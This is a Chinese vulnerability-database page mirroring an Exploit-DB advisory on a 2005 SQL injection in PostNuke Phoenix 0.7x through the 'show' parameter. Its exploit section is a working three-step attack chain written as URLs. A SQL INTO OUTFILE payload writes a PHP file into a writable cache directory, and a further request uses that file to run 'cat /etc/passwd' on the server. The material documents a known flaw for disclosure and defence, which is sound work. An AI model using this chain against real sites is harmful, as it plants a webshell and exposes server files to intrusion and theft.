PostNuke Phoenix 0.7x – ‘SHOW’ SQL Injection

19次阅读
没有评论

PostNuke Phoenix 0.7x – ‘SHOW’ SQL Injection

漏洞ID 1054933 漏洞类型
发布时间 2005-02-28 更新时间 2005-02-28
PostNuke Phoenix 0.7x - 'SHOW' SQL InjectionCVE编号 N/A
PostNuke Phoenix 0.7x - 'SHOW' SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25173
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12684/info

PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input.

It is reported that issue presents itself when malicious SQL syntax is issued to the application through the 'show' variable.

PostNuke 0.760-RC2 and prior versions are reported vulnerable. 

http://www.example.com/index.php?name=Downloads&req=search&query=&show=cXIb8O3

http://www.example.com/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

http://www.example.com/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd

相关推荐: WatchGuard Firebox II High Malformed Packet Rate Denial of Service Vulnerability

WatchGuard Firebox II High Malformed Packet Rate Denial of Service Vulnerability 漏洞ID 1103338 漏洞类型 Boundary Condition Error 发布时间 2…

正文完
 0